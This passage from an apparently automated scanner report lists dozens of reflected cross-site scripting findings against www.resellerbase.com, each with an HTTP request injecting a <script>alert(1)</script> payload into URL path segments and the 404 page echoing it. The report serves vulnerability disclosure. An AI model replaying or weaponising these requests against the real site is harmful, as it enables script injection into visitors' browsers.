User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar-system.css912b8<script>alert(1)</script>190baac01fb was not found on this server.</p>
...[SNIP]...

2.4775. http://www.resellerbase.com/themes/kosmos/calendar.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60f84<script>alert(1)</script>06429e8a448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes60f84<script>alert(1)</script>06429e8a448/kosmos/calendar.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes60f84<script>alert(1)</script>06429e8a448/kosmos/calendar.js was not found on this server.</p>
...[SNIP]...

2.4776. http://www.resellerbase.com/themes/kosmos/calendar.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f9e7<script>alert(1)</script>bb35cbed7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos5f9e7<script>alert(1)</script>bb35cbed7d7/calendar.js HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos5f9e7<script>alert(1)</script>bb35cbed7d7/calendar.js was not found on this server.</p>
...[SNIP]...

2.4777. http://www.resellerbase.com/themes/kosmos/calendar.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/calendar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f2d30<script>alert(1)</script>7330767dc1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/calendar.jsf2d30<script>alert(1)</script>7330767dc1a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/add.php?cat=10
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/calendar.jsf2d30<script>alert(1)</script>7330767dc1a was not found on this server.</p>
...[SNIP]...

2.4778. http://www.resellerbase.com/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef41f<script>alert(1)</script>f6716ea52ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesef41f<script>alert(1)</script>f6716ea52ad/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesef41f<script>alert(1)</script>f6716ea52ad/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4779. http://www.resellerbase.com/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb671<script>alert(1)</script>bbe3c98b5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosbb671<script>alert(1)</script>bbe3c98b5b/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosbb671<script>alert(1)</script>bbe3c98b5b/images/ was not found on this server.</p>
...[SNIP]...

2.4780. http://www.resellerbase.com/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14058<script>alert(1)</script>9242bcbd690 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images14058<script>alert(1)</script>9242bcbd690/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images14058<script>alert(1)</script>9242bcbd690/ was not found on this server.</p>
...[SNIP]...

2.4781. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2e6f<script>alert(1)</script>c48c9bd26ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesd2e6f<script>alert(1)</script>c48c9bd26ee/kosmos/images/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesd2e6f<script>alert(1)</script>c48c9bd26ee/kosmos/images/pr/ was not found on this server.</p>
...[SNIP]...

2.4782. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8311<script>alert(1)</script>7f26011e625 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosa8311<script>alert(1)</script>7f26011e625/images/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmosa8311<script>alert(1)</script>7f26011e625/images/pr/ was not found on this server.</p>
...[SNIP]...

2.4783. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62251<script>alert(1)</script>1ce671cd2fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images62251<script>alert(1)</script>1ce671cd2fd/pr/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images62251<script>alert(1)</script>1ce671cd2fd/pr/ was not found on this server.</p>
...[SNIP]...

2.4784. http://www.resellerbase.com/themes/kosmos/images/pr/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/pr/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e9c7e<script>alert(1)</script>31b818d510a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/pre9c7e<script>alert(1)</script>31b818d510a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/pre9c7e<script>alert(1)</script>31b818d510a/ was not found on this server.</p>
...[SNIP]...

2.4785. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17c49<script>alert(1)</script>f52bc89c0b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes17c49<script>alert(1)</script>f52bc89c0b8/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes17c49<script>alert(1)</script>f52bc89c0b8/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4786. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 71912<script>alert(1)</script>49375f5983c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos71912<script>alert(1)</script>49375f5983c/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos71912<script>alert(1)</script>49375f5983c/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4787. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12125<script>alert(1)</script>fc54178b8ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images12125<script>alert(1)</script>fc54178b8ba/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images12125<script>alert(1)</script>fc54178b8ba/rating/ was not found on this server.</p>
...[SNIP]...

2.4788. http://www.resellerbase.com/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3408f<script>alert(1)</script>108036b901b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/rating3408f<script>alert(1)</script>108036b901b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/rating3408f<script>alert(1)</script>108036b901b/ was not found on this server.</p>
...[SNIP]...

2.4789. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d970<script>alert(1)</script>e64f6ebee4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes9d970<script>alert(1)</script>e64f6ebee4e/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes9d970<script>alert(1)</script>e64f6ebee4e/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4790. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f687<script>alert(1)</script>cb9024e3af1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos3f687<script>alert(1)</script>cb9024e3af1/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos3f687<script>alert(1)</script>cb9024e3af1/images/review/ was not found on this server.</p>
...[SNIP]...

2.4791. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88937<script>alert(1)</script>84867a55710 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images88937<script>alert(1)</script>84867a55710/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images88937<script>alert(1)</script>84867a55710/review/ was not found on this server.</p>
...[SNIP]...

2.4792. http://www.resellerbase.com/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f2c9<script>alert(1)</script>9121620b9ce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/images/review8f2c9<script>alert(1)</script>9121620b9ce/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:55:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/images/review8f2c9<script>alert(1)</script>9121620b9ce/ was not found on this server.</p>
...[SNIP]...

2.4793. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2597<script>alert(1)</script>2cb7da3e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesd2597<script>alert(1)</script>2cb7da3e76/kosmos/images/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 22:56:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesd2597<script>alert(1)</script>2cb7da3e76/kosmos/images/template_24.gif/ was not found on this server.</p>
...[SNIP]...

2.4794. http://www.resellerbase.com/themes/kosmos/images/template_24.gif/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /themes/kosmos/images/template_24.gif/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c41b5<script>alert(1)</script>f9c754841ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmosc41b5<script>alert(1)</script>f9c754841ca/images/template_24.gif/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/blocks/block.whos_online.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
